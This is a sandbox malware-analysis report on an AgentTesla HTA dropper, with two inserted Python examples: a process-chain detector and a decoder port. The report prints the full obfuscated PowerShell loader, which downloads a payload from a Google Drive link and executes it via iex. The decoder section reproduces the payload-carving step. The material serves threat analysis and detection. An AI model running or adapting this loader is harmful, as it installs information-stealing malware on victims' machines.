Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2024 09:49

General

  • Target

    2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta

  • Size

    68KB

  • MD5

    7783fe86579a380bc61cdc4470dd0fc8

  • SHA1

    8dd0213228872a897f604a19ea0eda3dfb85ae20

  • SHA256

    2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9

  • SHA512

    0aa925c3b6fb73f806198dc331778e5628b874ac359de3a99f15cc53f2999426d01b0c6d55821c54b14ca6c9cac1f762db909e49395f5dc2ce8f3a53f55a8dea

  • SSDEEP

    192:giRpwijIw1govv2jEVUZDuEDMD+Y3Pet3pltqE6Nb6/0vOS2336SQ:dvS7ZvrS86S

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) and information stealer written in Visual Basic (.NET).

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
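The process tree in the Processes section that follows (mshta.exe opening the .hta, PowerShell spawning a second PowerShell, which starts the unrelated signed binary wab.exe with no arguments) is the chain a detection engineer would key on; the SetThreadContext, MapViewOfSection and WriteProcessMemory signatures on the second PowerShell, together with the memory regions dumped from wab.exe, are consistent with the payload being injected into wab.exe rather than wab.exe doing anything on its own. The following is an added example, not part of the report, that matches that parent chain over constructed process-creation events. The event field names are an assumption loosely modelled on Sysmon Event ID 1; the report's PIDs are reused, while the root parent PID and the benign explorer.exe/wab.exe control rows are made up.

```python
"""Added example, not part of the report: a parent-chain matcher for the process
tree recorded in the Processes section (mshta.exe -> powershell.exe ->
powershell.exe -> wab.exe). Event records are constructed to mirror that tree;
field names are an assumption loosely modelled on Sysmon Event ID 1, and the
root parent PID and the benign control rows are invented."""
import ntpath
from typing import Dict, List, Tuple

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
WAB = r"C:\Program Files (x86)\windows mail\wab.exe"
HTA = r"C:\Users\Admin\AppData\Local\Temp\2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta"

# Constructed process-creation events. PIDs 2028/2552/2496/2688/1924/2976 are the
# ones in the report; 900, 700, 1500 and 3100 are invented (root and benign control).
EVENTS: List[Dict] = [
    {"pid": 2028, "ppid": 900,  "image": r"C:\Windows\SysWOW64\mshta.exe", "cmd": f'mshta.exe "{HTA}"'},
    {"pid": 2552, "ppid": 2028, "image": PS,  "cmd": "powershell.exe <obfuscated stage>"},
    {"pid": 2496, "ppid": 2552, "image": CMD, "cmd": r'cmd.exe /c "echo %appdata%\Unfirmamented.Jab && echo $"'},
    {"pid": 2688, "ppid": 2552, "image": PS,  "cmd": "powershell.exe <obfuscated stage>"},
    {"pid": 1924, "ppid": 2688, "image": CMD, "cmd": r'cmd.exe /c "echo %appdata%\Unfirmamented.Jab && echo $"'},
    {"pid": 2976, "ppid": 2688, "image": WAB, "cmd": f'"{WAB}"'},
    # benign control: Windows Contacts opened by the user from the shell
    {"pid": 1500, "ppid": 700,  "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 3100, "ppid": 1500, "image": WAB, "cmd": f'"{WAB}"'},
]

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
INJECTION_HOSTS = {"wab.exe"}   # the signed host abused here; extend from your own telemetry


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(events: List[Dict], pid: int, max_depth: int = 8) -> List[str]:
    """Image basenames of pid's ancestors, nearest parent first. Stops when the
    parent is missing from the event set or at max_depth (guards PID-reuse loops)."""
    by_pid = {e["pid"]: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        chain.append(basename(cur["image"]))
    return chain


def detect(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for events matching the HTA -> PowerShell -> wab.exe chain."""
    hits = []
    for e in events:
        name, parents = basename(e["image"]), ancestry(events, e["pid"])
        if name == "powershell.exe" and parents[:1] == ["mshta.exe"]:
            hits.append((e["pid"], "powershell.exe launched by mshta.exe (HTA dropper)"))
        if name in INJECTION_HOSTS and any(p in SCRIPT_HOSTS for p in parents):
            hits.append((e["pid"], f"{name} started under a script host (likely injection target)"))
    return hits


if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The second rule walks the whole ancestry rather than the direct parent because the injection host here is two levels below the HTA launcher and the intermediate cmd.exe/PowerShell layers vary between samples; in production telemetry, correlate on process GUIDs rather than PIDs to avoid PID reuse.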

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$magni = 1;$Anteroexternal='S';$Anteroexternal+='ubstrin';$Anteroexternal+='g';Function Tllings($Sedated161){$Sangrel91=$Sedated161.Length-$magni;For($Ailing=1;$Ailing -lt $Sangrel91;$Ailing+=2){$Soljers+=$Sedated161.$Anteroexternal.Invoke( $Ailing, $magni);}$Soljers;}function rehearsed($Predrove){. ($Lepal) ($Predrove);}$Tobenedes45=Tllings 'AM o zYi l laa,/,5R. 0G (,W.iFnAdBoHwNsK NN T, .1I0,. 0 ;S KWsiMn,6F4s;D xD6H4,; Lrpv,: 1T2.1 .B0 )S DG,e.c kpoF/ 2B0.1 0.0.1.0B1M pFSiSr.eSf,oBx /S1F2T1l..0 ';$Vrinskedes=Tllings 'CUKs eSrU-NASg eCn,tU ';$Footcloths=Tllings 'Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ';$Parametrizing=Tllings ' >E ';$Lepal=Tllings 'TiSe xP ';$Adiantum201='Popularizes';rehearsed (Tllings ',S.e t.- CIo nAtPeFn,tA -,P aStShM VT.:v\.K a p iStNaslSf oKr kAl a,rAiPnLgSeCn ..t.xMtS ,- V aFlPu eA L$ AEd i aOnGtHu mS2K0,1 ; ');rehearsed (Tllings 'Ri.fU ,(Lt eGs,tL-.p aCt hI RT :.\TKNa p,iTtBa.lSfHo r kOlSa r.iUn.g e,n .Ot,xAt,)R{ e xSiHtD}O;T ');$Casual91 = Tllings ' eVc hMoA %.a p pFdKaDtua %,\ Ukn fIiBrPm a mKeMn.tGe,dC. J,a b ,&T&. Oe.c.hVo i$L ';rehearsed (Tllings 'D$Pg.l o b,a,lA:,U,nBvNa l,e.t.u,d,iRn aPrkyi=S(Tc m dU / c C$MCFa.sSu a lB9R1I)J ');rehearsed (Tllings ' $TgJl,oSb a lF: R uGtSe b.iEl = $BF oTo tAc lSoRt,h s,.EsAp lAi tO(C$CP.aIr aFmHeBt rVi.z i nSg )B ');$Footcloths=$Rutebil[0];rehearsed (Tllings 'R$IgslEoPbSaBlU:EUBn iMfSaDcRiFa lK= Nve wA- OOb jBe c,t, RS y s tsermU.FN eEt . WUeCb,CKl iNe.n,tG ');rehearsed (Tllings ' $,U n i f a cFi a l .SH,eKa dDe ras,[p$,V,rCi,nDs.k,eTdeeBs.]S=V$ATSo b.eFn e.d e s.4O5W ');$Mambos=Tllings 'MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ';$Mambos=$Unvaletudinary[1]+$Mambos;$Tunnelers=$Unvaletudinary[0];rehearsed (Tllings 'P$.g.lbo bPaVlC:LUNdLsCtAi k.nJi n g,e rSsF= ( T eHs tU- P.ahtIhP U$NTMu nAn.eNlPe.r sW) ');while (!$Udstikningers) {rehearsed (Tllings ' $Ug,l oSb.a lS:BCYo,u,nAt e.rFmJotvJe,d = $At rUu e. ') ;rehearsed $Mambos;rehearsed (Tllings 'CSGtSaRrCt,-SS lFe,eDpr V4 ');rehearsed (Tllings 'B$Mg,lDocbNa.lD: UPd sUt ihk nCiAn.g.eOrDs = (IT e.s tS-EP,aBtFhM D$ T,u nUnSe lMezrKs )b ') ;rehearsed (Tllings ' $,g l.oDbaaSl :CN,eSaTp =M$SgEl,o b aUl :FtGe rFiSs,k,+K+M% $,RLu.tSeFbTiFlM. c o.u n,t. ') ;$Footcloths=$Rutebil[$Neap];}rehearsed (Tllings 'V$Cg l o.bAa.l.:US k n h.eFd,eSr sa =O GCeBtF-OC,o nHtCeSnRt A$DTPuLn,nRe.lOe.r s ');rehearsed (Tllings 'L$ gGlBo b aAl :DKBoqnGg,sGg a aMrUd.e nKek6E0 e=A D[MS yls t.eFm .gCbo.n.vRe.rGt ]K: :.FTr oHm BdaBs e.6O4 SStTrMiSnTg ( $FSBk.nEhEe dWeDr sA) ');rehearsed (Tllings ' $Dg l o b,a l,: PSlOo u gEh h.eAaPd =, H[.S,y s,t ePmR..TFe xUtm.SE nTc oVdsi nFgA]L:B: A SUC,I I,. G eLtSSMtMr,i nUgC( $ K oKnNgCs g aWaHr d e nSeC6 0C)T ');rehearsed (Tllings ' $,g.l ocb aTlA:,BAuBtPtPoBnGmSoSuTlfdV=H$mP lDoRuPgChThHe.a.d,.,s.uSb s t,rEiAn,gG( 3A5C3 0A3r3,,P2B7 7S2,9M), ');rehearsed $Buttonmould;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfirmamented.Jab && echo $"
        3⤵
          PID:2496
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$magni = 1;$Anteroexternal='S';$Anteroexternal+='ubstrin';$Anteroexternal+='g';Function Tllings($Sedated161){$Sangrel91=$Sedated161.Length-$magni;For($Ailing=1;$Ailing -lt $Sangrel91;$Ailing+=2){$Soljers+=$Sedated161.$Anteroexternal.Invoke( $Ailing, $magni);}$Soljers;}function rehearsed($Predrove){. ($Lepal) ($Predrove);}$Tobenedes45=Tllings 'AM o zYi l laa,/,5R. 0G (,W.iFnAdBoHwNsK NN T, .1I0,. 0 ;S KWsiMn,6F4s;D xD6H4,; Lrpv,: 1T2.1 .B0 )S DG,e.c kpoF/ 2B0.1 0.0.1.0B1M pFSiSr.eSf,oBx /S1F2T1l..0 ';$Vrinskedes=Tllings 'CUKs eSrU-NASg eCn,tU ';$Footcloths=Tllings 'Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ';$Parametrizing=Tllings ' >E ';$Lepal=Tllings 'TiSe xP ';$Adiantum201='Popularizes';rehearsed (Tllings ',S.e t.- CIo nAtPeFn,tA -,P aStShM VT.:v\.K a p iStNaslSf oKr kAl a,rAiPnLgSeCn ..t.xMtS ,- V aFlPu eA L$ AEd i aOnGtHu mS2K0,1 ; ');rehearsed (Tllings 'Ri.fU ,(Lt eGs,tL-.p aCt hI RT :.\TKNa p,iTtBa.lSfHo r kOlSa r.iUn.g e,n .Ot,xAt,)R{ e xSiHtD}O;T ');$Casual91 = Tllings ' eVc hMoA %.a p pFdKaDtua %,\ Ukn fIiBrPm a mKeMn.tGe,dC. J,a b ,&T&. Oe.c.hVo i$L ';rehearsed (Tllings 'D$Pg.l o b,a,lA:,U,nBvNa l,e.t.u,d,iRn aPrkyi=S(Tc m dU / c C$MCFa.sSu a lB9R1I)J ');rehearsed (Tllings ' $TgJl,oSb a lF: R uGtSe b.iEl = $BF oTo tAc lSoRt,h s,.EsAp lAi tO(C$CP.aIr aFmHeBt rVi.z i nSg )B ');$Footcloths=$Rutebil[0];rehearsed (Tllings 'R$IgslEoPbSaBlU:EUBn iMfSaDcRiFa lK= Nve wA- OOb jBe c,t, RS y s tsermU.FN eEt . WUeCb,CKl iNe.n,tG ');rehearsed (Tllings ' $,U n i f a cFi a l .SH,eKa dDe ras,[p$,V,rCi,nDs.k,eTdeeBs.]S=V$ATSo b.eFn e.d e s.4O5W ');$Mambos=Tllings 'MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ';$Mambos=$Unvaletudinary[1]+$Mambos;$Tunnelers=$Unvaletudinary[0];rehearsed (Tllings 'P$.g.lbo bPaVlC:LUNdLsCtAi k.nJi n g,e rSsF= ( T eHs tU- P.ahtIhP U$NTMu nAn.eNlPe.r sW) ');while (!$Udstikningers) {rehearsed (Tllings ' $Ug,l oSb.a lS:BCYo,u,nAt e.rFmJotvJe,d = $At rUu e. ') ;rehearsed $Mambos;rehearsed (Tllings 'CSGtSaRrCt,-SS lFe,eDpr V4 ');rehearsed (Tllings 'B$Mg,lDocbNa.lD: UPd sUt ihk nCiAn.g.eOrDs = (IT e.s tS-EP,aBtFhM D$ T,u nUnSe lMezrKs )b ') ;rehearsed (Tllings ' $,g l.oDbaaSl :CN,eSaTp =M$SgEl,o b aUl :FtGe rFiSs,k,+K+M% $,RLu.tSeFbTiFlM. c o.u n,t. ') ;$Footcloths=$Rutebil[$Neap];}rehearsed (Tllings 'V$Cg l o.bAa.l.:US k n h.eFd,eSr sa =O GCeBtF-OC,o nHtCeSnRt A$DTPuLn,nRe.lOe.r s ');rehearsed (Tllings 'L$ gGlBo b aAl :DKBoqnGg,sGg a aMrUd.e nKek6E0 e=A D[MS yls t.eFm .gCbo.n.vRe.rGt ]K: :.FTr oHm BdaBs e.6O4 SStTrMiSnTg ( $FSBk.nEhEe dWeDr sA) ');rehearsed (Tllings ' $Dg l o b,a l,: PSlOo u gEh h.eAaPd =, H[.S,y s,t ePmR..TFe xUtm.SE nTc oVdsi nFgA]L:B: A SUC,I I,. G eLtSSMtMr,i nUgC( $ K oKnNgCs g aWaHr d e nSeC6 0C)T ');rehearsed (Tllings ' $,g.l ocb aTlA:,BAuBtPtPoBnGmSoSuTlfdV=H$mP lDoRuPgChThHe.a.d,.,s.uSb s t,rEiAn,gG( 3A5C3 0A3r3,,P2B7 7S2,9M), ');rehearsed $Buttonmould;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2688
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfirmamented.Jab && echo $"
            4⤵
              PID:1924
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2976
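The PowerShell command line above is obfuscated with a single trick: every string literal is passed through Tllings(), which keeps only the characters at odd positions (1, 3, 5, ... up to but excluding the last index) and throws the rest away, and the result is run through the alias stored in $Lepal, which decodes to "iex". Decoding the strings shows the loader's flow: set a User-Agent header, split the URL list on ">", fetch the payload with WebClient.DownloadFile into %APPDATA%\Unfirmamented.Jab (the drop path and the leading "$" of the method call both come from the child cmd.exe line "echo %appdata%\Unfirmamented.Jab && echo $"), Start-Sleep 4 and retry until Test-Path succeeds, then Get-Content the file, base64-decode it, ASCII-decode the bytes and iex the slice .substring(353033,27729) as the next stage; 353033 + 27729 bytes of decoded data is consistent with the 495KB base64 file listed under Downloads. The following is an added example, not part of the report or the sample, that ports the decoder to Python and reproduces the carving step on a constructed stand-in for Unfirmamented.Jab. The sample strings are copied verbatim from the PID 2552 command line; note that the report page collapses runs of whitespace, so strings whose filler produced two adjacent spaces (the cmd.exe echo line and the User-Agent value among them) do not decode from the page text and need the original .hta.

```python
"""Added example: a Python port of the string decoder ("Tllings") used by the
PowerShell stage above, plus the post-download carving arithmetic. Not part of
the report or of the sample; the obfuscated strings are copied from the command
line shown for PID 2552, and the .Jab input is constructed here."""
import base64

STAGE_OFFSET, STAGE_LENGTH = 353033, 27729   # from the decoded .substring(353033,27729)


def tllings(s: str) -> str:
    """Port of the sample's Tllings(): keep characters at indices 1, 3, 5, ...
    while index < len(s) - 1 ($Sangrel91 = Length - 1); everything else is filler."""
    return "".join(s[i] for i in range(1, len(s) - 1, 2))


# Obfuscated strings copied verbatim from the PID 2552 command line. Only strings
# whose filler never produced two adjacent spaces survive the report page intact;
# the page rendering collapses whitespace runs, so e.g. the string that builds the
# cmd.exe "echo %appdata%\Unfirmamented.Jab && echo $" line does not decode from
# the page text and must be taken from the original .hta.
SAMPLE_STRINGS = {
    "header name":   "CUKs eSrU-NASg eCn,tU ",
    "invoke alias":  "TiSe xP ",
    "url separator": " >E ",
    "retry delay":   "CSGtSaRrCt,-SS lFe,eDpr V4 ",
    "download call": "MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ",
    "payload url":   "Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ",
}


def decode_sample_strings() -> dict:
    """Decode every string in SAMPLE_STRINGS with the sample's own scheme."""
    return {label: tllings(raw) for label, raw in SAMPLE_STRINGS.items()}


def carve_stage(jab_text: str, offset: int = STAGE_OFFSET, length: int = STAGE_LENGTH) -> str:
    """Mirror of the sample's steps once the download exists:
    Get-Content -> [Convert]::FromBase64String -> [Text.Encoding]::ASCII.GetString
    -> .substring(offset, length). Assumes the file is a single base64 line."""
    raw = base64.b64decode(jab_text.strip())
    # .NET ASCII decoding maps every byte >= 0x80 to '?', one char per byte,
    # so the substring offsets are plain byte offsets into the decoded blob.
    ascii_text = "".join(chr(b) if b < 0x80 else "?" for b in raw)
    return ascii_text[offset:offset + length]


def build_constructed_jab(stage: str) -> str:
    """Constructed stand-in for Unfirmamented.Jab (not the real file): filler bytes
    with `stage` planted at STAGE_OFFSET, space-padded to STAGE_LENGTH, base64-encoded."""
    body = stage.encode("ascii").ljust(STAGE_LENGTH, b" ")
    filler = bytes(range(256)) * 1400          # 358,400 bytes of deterministic junk
    blob = filler[:STAGE_OFFSET] + body + filler[:4096]
    return base64.b64encode(blob).decode("ascii")


if __name__ == "__main__":
    for label, value in decode_sample_strings().items():
        print(f"{label:14s} {value}")
    carved = carve_stage(build_constructed_jab("$global:Marker='constructed stage'"))
    print("carved stage:", carved.rstrip())
```

Run against a real copy of the dropped file, carve_stage(open(path).read()) returns the next-stage script exactly as the loader would iex it; the decoded payload URL is the Google Drive download behind the "Legitimate hosting services abused for malware hosting/C2" signature, and the same offset/length pair is the most reliable pivot for finding other droppers built from the same template, since the filler characters and variable names change between builds while the carving arithmetic is tied to the hosted blob.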

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        2666ade7567bc2271a7e376cb87dc0d4

        SHA1

        1aa6dfda24a4b3c0b5e46a978a9ff29073c0bebb

        SHA256

        d6460f541d692fd358b635bc9cf3c13270775338bd80504209b9d82c61a8970e

        SHA512

        be622e03b4d9988756e35a490e5180daead972b3a720e55ca87346b455de7223c49c27ed4cd06af7d3dfdf0dad4c399da761a26e2a627d1af8af281a3977af67

      • C:\Users\Admin\AppData\Roaming\Unfirmamented.Jab

        Filesize

        495KB

        MD5

        e6d8c108a21b9069c94e6ec0a9c97c09

        SHA1

        bd2c70ea4fe821e802d20b1e01bab00be8a36d71

        SHA256

        db4cef19f055629af73bd763b8dc82327c48cdc9f2aefff8c6505732ddb04800

        SHA512

        0f6fe8c176acfe4daeb7d7fee41c053e77601a90a48abcefac9ebfa7b3ca5238f77e936fd5e801d1e55781399d301c003d7cc7d27eb1647d54a5dfdd9729dd16

      • memory/2688-15-0x00000000066C0000-0x00000000083B0000-memory.dmp

        Filesize

        28.9MB

      • memory/2976-38-0x00000000009A0000-0x0000000001A02000-memory.dmp

        Filesize

        16.4MB

      • memory/2976-39-0x00000000009A0000-0x00000000009E2000-memory.dmp

        Filesize

        264KB